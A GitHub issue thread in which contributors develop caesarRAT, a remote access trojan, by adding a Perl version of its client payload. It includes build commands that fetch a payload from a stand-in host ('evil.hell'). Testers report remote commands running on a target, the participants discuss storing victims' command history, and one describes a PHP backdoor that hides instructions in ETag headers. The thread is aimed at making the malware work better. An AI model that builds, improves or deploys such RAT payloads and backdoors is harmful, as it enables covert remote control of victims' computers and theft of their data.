Closed gottburgm closed 6 years ago
gottburgm
commented
6 years ago Instructions
git clone https://github.com/gottburgm/caesarRAT caesarRAT-forked
cd caesarRAT-forked
sh install.sh
cd Client
perl builder.pl perl_payload http://evil.hell/caesar_install/client.py \<=> outputs/perl_payload.pl
client.exe \<=> outputs/perl_payload
0blio
commented
6 years ago Nice work! Thank you. One of the goals of the project is to "translate" the payload in more languages as possibile. I just tested your perl payload and it works great apart from a few small problems.
cd the payload change correctly the directory but return the following output to the server:
Warning: Couldn't Move To : <directory_name_here>
xcalc the perl payload wait until the calc is not closed.
It should spawn a subprocess with the calc and add it to a list of subprocesses.
For the rest it works perfectly, compliments. I'll add it to the main project once it will be fixed. My objective would be to create a unique generator that allow to select the type of payload, the language, the delay etc.
gottburgm
commented
6 years ago Thank's for the feedbacks ! The first bug will be fixed today and for the second one i will need to look how to handle this, because the python way to manage process is totally different than the perl one that i usually use but i will find something ;) keep you aware !
0blio
commented
6 years ago Any update?
gottburgm
commented
6 years ago in fact i fixed the first bug in few seconds yesterday but i forgot to commit hahahahaha. The second problem is really more problematic. Tried some stuff but it was really not stable.. There is also a major problem i think. Actually the number of requests done with the python client is crazy and with the perl, less requests but still to much. The second problem that i have is the database stuff. The RAT is way to slow. Because we are sending plaintext data, and we store it each time and read the database each time . I made a backdooring tool wich give you a fake shell and send the commands to a php backdoor file. It was hard and i avoided the storing feature because its too big. i was passing encoded instructions trough ETag http header and store all the outputs in files that i could read or download. but i made many precoded function to be able to have something usable. What do you think ?
0blio
commented
6 years ago The database is the only way to keep track of the user history (input, output, datetime of the request, datetime of the response and many more). In the future the target history will be exportable in a convenient dump in order to allow local analysis, so I think the database is important.
Caesar can be slow because HTTP is stateless. We're not connected directly via socket so, in order to make the target to execute a command, we have to:
So the average response time is 2 or 3 second. Most of the free web-services doesn't support sockets and don't let you open ports, so an HTTP implementation was the only possibile thing to do.
I'm curious to see your backdooring tool, commit it if you want. I will give it a look.
Soon I'm also gonna test the new perl shell (with cd fix).
gottburgm
commented
6 years ago yeah i see let me think about it . because there are some other ways to make it faster. i will commit in 1 hour (i need to finish my raid in World Of Warcraft kek)
gottburgm
commented
6 years ago Commited ! There was a major stupid bug that removed the separator ("
0blio
commented
6 years ago Ok! I'm gonna test it in a few hours :)
Hello again !
I installed and tried your RAT all was fine except one thing ... i hate python and the generated client payload was in python 😃 So i made an equivalent in perl. Let me know if you are interested by it and i will create a repo on my git with the file. I will also have a look at pp packager and if i have time i will make a generator.